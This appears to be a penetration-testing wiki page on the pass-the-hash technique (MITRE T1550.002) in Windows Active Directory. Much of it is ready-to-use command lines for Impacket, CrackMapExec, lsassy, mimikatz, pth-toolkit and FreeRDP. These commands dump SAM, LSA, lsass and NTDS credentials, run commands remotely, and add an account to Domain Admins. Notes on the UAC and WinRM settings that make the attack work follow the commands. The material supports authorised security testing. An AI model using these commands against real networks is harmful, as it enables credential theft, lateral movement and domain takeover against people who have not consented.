Pass the hash
MITRE ATT&CK™ Sub-technique T1550.002
An attacker knowing a user's NT hash can use it to authenticate over NTLM (pass-the-hash) (or indirectly over Kerberos with overpass-the-hash).
There are many tools that implement pass-the-hash: Impacket scripts (Python) (psexec, smbexec, secretsdump...), CrackMapExec (Python), FreeRDP (C), mimikatz (C), lsassy (Python), pth-toolkit (Python) and many more.
Credentials dumping
Command execution
AD operations
RDP access
The Impacket script secretsdump (Python) has the ability to remotely dump hashes and LSA secrets from a machine (
LMhash
can be empty) (see dumping credentials from registry hives).secretsdump.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'
secretsdump.py -hashes ':NThash' 'DOMAIN/USER@TARGET'
secretsdump.py 'DOMAIN/USER:PASSWORD@TARGET'
CrackMapExec (Python) has the ability to do it on a set of targets. The
bh_owned
has the ability to set targets as "owned" in BloodHound (see dumping credentials from registry hives).crackmapexec smb $TARGETS -u $USER -H $NThash --sam --local-auth
crackmapexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash --lsa
crackmapexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash --ntds
Lsassy (Python) has the ability to do it with higher success probabilities as it offers multiple dumping methods. This tool can set targets as "owned" in BloodHound. It works in standalone but also as a CrackMapExec module (see dumping credentials from lsass process memory).
crackmapexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash -M lsassy
crackmapexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash -M lsassy -o BLOODHOUND=True NEO4JUSER=neo4j NEO4JPASS=Somepassw0rd
lsassy -u $USER -H $NThash $TARGETS
lsassy -d $DOMAIN -u $USER -H $NThash $TARGETS
Some Impacket scripts enable testers to execute commands on target systems with pass-the-hash (
LMhash
can be empty).psexec.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'
smbexec.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'
wmiexec.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'
atexec.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'
dcomexec.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'
crackmapexec winrm $TARGETS -d $DOMAIN -u $USER -p $PASSWORD -x whoami
crackmapexec smb $TARGETS --local-auth -u $USER -H $NThash -x whoami
crackmapexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash -x whoami
sekurlsa::pth /user:$USER /domain:$DOMAIN /ntlm:$NThash
The pth-toolkit (Python) can be used from a Linux system to operate LDAP queries, add a user to a group and so on (
LMhash
can be ffffffffffffffffffffffffffffffff
).pth-net rpc group members "Domain admins" -U 'Domain/User%LMhash:NThash' -S $DOMAIN_CONTROLLER
pth-net rpc group addmem "Domain admins" Shutdown -U 'Domain/Admin%LMhash:NThash' -S $DOMAIN_CONTROLLER
xfreerdp /u:$USER /d:$DOMAIN /pth:'LMhash:NThash' /v:$TARGET /h:1010 /w:1920
UAC limits pass-the-hash
UAC (User Account Control) limits which local users can do remote administration operations. And since most of the attacks exploiting pass-the-hash rely on remote admin operations, it affects this technique.
- the registry key
LocalAccountTokenFilterPolicy
is set to0
by default. It means that the built-in local admin account (RID-500, "Administrator") is the only local account allowed to do remote administration tasks. Setting it to1
allows the other local admins as well. - the registry key
FilterAdministratorToken
is set to0
by default. It allows the built-in local admin account (RID-500, "Administrator") to do remote administration tasks. If set to1
, it doesn't.
In short, by default, only the following accounts can fully take advantage of pass-the-hash:
- local accounts : the built-in, RID-500, "Administrator" account
- domain accounts : all domain accounts with local admin rights
WinRM enables pass-the-hash
Testers should look out for environments with WinRM enabled. During the WinRM configuration, the
Enable-PSRemoting
sets the LocalAccountTokenFilterPolicy
to 1
, allowing all local accounts with admin privileges to do remote admin tasks, hence allowing those accounts to fully take advantage of pass-the-hash.Machine accounts
Just like with any other domain account, a machine account's NT hash can be used with pass-the-hash, but it is not possible to operate remote operations that require local admin rights (such as SAM & LSA secrets dump). These operations can instead be conducted after crafting a Silver Ticket or doing S4U2self abuse, since the machine accounts validates Kerberos tickets used to authenticate to a said computer/service.
A domain controller machine account's NT hash can be used with pass-the-hash to dump the domain hashes (NTDS.dit).
Last modified 2mo ago